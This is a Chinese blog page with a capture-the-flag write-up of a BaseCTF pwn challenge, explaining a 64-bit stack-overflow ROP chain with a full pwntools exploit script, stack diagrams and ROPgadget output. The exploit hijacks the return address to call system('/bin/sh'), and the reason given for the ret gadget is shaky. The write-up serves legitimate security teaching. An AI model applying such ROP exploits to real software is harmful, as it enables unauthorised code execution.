<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"maple-pwn.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Basectf pwn方向“我把她丢了”by Maple 简单的栈溢出ROP题目，题上已经给了system和&#x2F;bin&#x2F;sh的字符串,只需要做一个组合就好。 在64位中，函数的参数是利用寄存器传递的，而第一个参数一般是存放在rdi中的,所以我们先用pop rdi ret把bin&#x2F;sh字符串地址放在rdi然后再调用system函数即可，调用使用函数的plt表 123456">
<meta property="og:type" content="article">
<meta property="og:title" content="Maple">
<meta property="og:url" content="http://maple-pwn.github.io/2025/04/04/basectf/2rd_%E6%88%91%E6%8A%8A%E5%A5%B9%E4%B8%A2%E4%BA%86/wbtdl/index.html">
<meta property="og:site_name" content="Maple">
<meta property="og:description" content="Basectf pwn方向“我把她丢了”by Maple 简单的栈溢出ROP题目，题上已经给了system和&#x2F;bin&#x2F;sh的字符串,只需要做一个组合就好。 在64位中，函数的参数是利用寄存器传递的，而第一个参数一般是存放在rdi中的,所以我们先用pop rdi ret把bin&#x2F;sh字符串地址放在rdi然后再调用system函数即可，调用使用函数的plt表 123456">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-04-03T17:34:36.648Z">
<meta property="article:modified_time" content="2025-02-11T08:36:29.645Z">
<meta property="article:author" content="Maple">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://maple-pwn.github.io/2025/04/04/basectf/2rd_%E6%88%91%E6%8A%8A%E5%A5%B9%E4%B8%A2%E4%BA%86/wbtdl/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://maple-pwn.github.io/2025/04/04/basectf/2rd_%E6%88%91%E6%8A%8A%E5%A5%B9%E4%B8%A2%E4%BA%86/wbtdl/","path":"2025/04/04/basectf/2rd_我把她丢了/wbtdl/","title":""}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title> | Maple</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Maple</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Maple’s Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Basectf-pwn%E6%96%B9%E5%90%91%E2%80%9C%E6%88%91%E6%8A%8A%E5%A5%B9%E4%B8%A2%E4%BA%86%E2%80%9D"><span class="nav-number">1.</span> <span class="nav-text">Basectf pwn方向“我把她丢了”</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#pop-rdi"><span class="nav-number">1.1.</span> <span class="nav-text">pop_rdi</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ret"><span class="nav-number">1.2.</span> <span class="nav-text">ret</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%88%E5%B8%A7%E5%88%86%E6%9E%90"><span class="nav-number">1.3.</span> <span class="nav-text">栈帧分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pop-rdi%E5%92%8Cret%E5%9C%B0%E5%9D%80%E7%9A%84%E6%90%9C%E7%B4%A2"><span class="nav-number">1.4.</span> <span class="nav-text">pop_rdi和ret地址的搜索</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Maple</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://maple-pwn.github.io/2025/04/04/basectf/2rd_%E6%88%91%E6%8A%8A%E5%A5%B9%E4%B8%A2%E4%BA%86/wbtdl/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Maple">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Maple">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content=" | Maple">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-04 01:34:36" itemprop="dateCreated datePublished" datetime="2025-04-04T01:34:36+08:00">2025-04-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-02-11 16:36:29" itemprop="dateModified" datetime="2025-02-11T16:36:29+08:00">2025-02-11</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="Basectf-pwn方向“我把她丢了”"><a href="#Basectf-pwn方向“我把她丢了”" class="headerlink" title="Basectf pwn方向“我把她丢了”"></a>Basectf pwn方向“我把她丢了”</h1><p>by Maple</p>
<p>简单的栈溢出ROP题目，题上已经给了system和&#x2F;bin&#x2F;sh的字符串,只需要做一个组合就好。</p>
<p>在64位中，函数的参数是利用寄存器传递的，而第一个参数一般是存放在rdi中的,所以我们先用pop rdi ret把bin&#x2F;sh字符串地址放在rdi然后再调用system函数即可，调用使用函数的plt表</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&quot;./wbtdl&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./wbtdl&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x401196</span></span><br><span class="line">binsh = <span class="number">0x402008</span></span><br><span class="line">ret = <span class="number">0x40101a</span></span><br><span class="line">shell = elf.plt[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x78</span>+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>这里依次解释一下payload构造的每一项的作用</p>
<h2 id="pop-rdi"><a href="#pop-rdi" class="headerlink" title="pop_rdi"></a>pop_rdi</h2><p>首先要知道，在x86-64架构下，rdi寄存器用于传递第一个整数或指针参数给函数。而pop_rdi一般是在堆叠溢出漏洞时用于设置函数调用的第一个参数，在这里pop_rdi的作用是从栈顶弹出一个值并将其放入rdi寄存器中</p>
<h2 id="ret"><a href="#ret" class="headerlink" title="ret"></a>ret</h2><p>ret指令在这里起到一个“跳板”的作用，确保程序可以按照预期的顺序执行和函数调用，也就是在执行pop_rdi将binsh的地址弹出到rdi寄存器后，通过ret返回到system函数</p>
<p>不加会怎么样：</p>
<p>如果不使用ret指令，直接在pop_rdi后面跟system函数的地址，那么在执行完pop_rdi后，PC会直接跳转到system函数，而不是从栈中弹出返回地址，这会导致system函数的参数传递不正确</p>
<h2 id="栈帧分析"><a href="#栈帧分析" class="headerlink" title="栈帧分析"></a>栈帧分析</h2><p><code>payload = payload = b&#39;a&#39;*0x78+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)</code></p>
<ol>
<li>初始状态的栈状态如下</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[ ... ]  &lt;- 堆栈顶</span><br><span class="line">[ 返回地址 ]  &lt;- 被溢出覆盖</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>填充120字节的<code>a</code>后，覆盖栈上的返回地址</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[ ... ]  &lt;- 堆栈顶</span><br><span class="line">[ <span class="number">0x401196</span> ]  &lt;- pop_rdi gadget地址</span><br><span class="line">[ <span class="number">0x402008</span> ]  &lt;- /bin/sh字符串地址</span><br><span class="line">[ <span class="number">0x40101a</span> ]  &lt;- ret指令地址</span><br><span class="line">[ <span class="number">0x401050</span> ]  &lt;- system函数地址</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>执行pop_rdi gadget后，栈顶弹出binsh地址，并放入rdi寄存器</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[ ... ]  &lt;- 堆栈顶</span><br><span class="line">[ <span class="number">0x40101a</span> ]  &lt;- ret指令地址</span><br><span class="line">[ <span class="number">0x401050</span> ]  &lt;- system函数地址</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>ret指令被弹出，跳转到该地址执行</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[ ... ]  &lt;- 堆栈顶</span><br><span class="line">[ <span class="number">0x401050</span> ]  &lt;- system函数地址</span><br></pre></td></tr></table></figure>

<ol start="5">
<li>执行system函数，ret指令从栈中弹出0x401050地址。于是system函数被调用，因为bin&#x2F;sh的地址存放于rdi中，所以system调用rdi中的地址就是调用了bin&#x2F;sh，从而执行了bin&#x2F;sh</li>
</ol>
<h2 id="pop-rdi和ret地址的搜索"><a href="#pop-rdi和ret地址的搜索" class="headerlink" title="pop_rdi和ret地址的搜索"></a>pop_rdi和ret地址的搜索</h2><p>在有ROPgadget的情况下可以直接</p>
<p><code>ROPgadget --binary &lt;filename&gt; -only &quot;pop|ret&quot;</code></p>
<p>例如：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">linux&gt; ROPgadget --binary wbtdl --only <span class="string">&quot;pop|ret&quot;</span></span><br><span class="line"></span><br><span class="line">Gadgets information</span><br><span class="line">============================================================</span><br><span class="line"><span class="number">0x000000000040117d</span> : pop rbp ; ret</span><br><span class="line"><span class="number">0x0000000000401196</span> : pop rdi ; ret</span><br><span class="line"><span class="number">0x000000000040101a</span> : ret</span><br><span class="line"></span><br><span class="line">Unique gadgets found: <span class="number">3</span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/04/basectf/11_%E6%B2%A1%E6%9C%89canary%E6%88%91%E8%A6%81%E6%AD%BB%E4%BA%86/wp/" rel="prev" title="">
                  <i class="fa fa-angle-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/04/basectf/3st_%E5%BD%BB%E5%BA%95%E5%A4%B1%E5%8E%BB%E4%BB%96/cdsqt/" rel="next" title="">
                   <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Maple</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
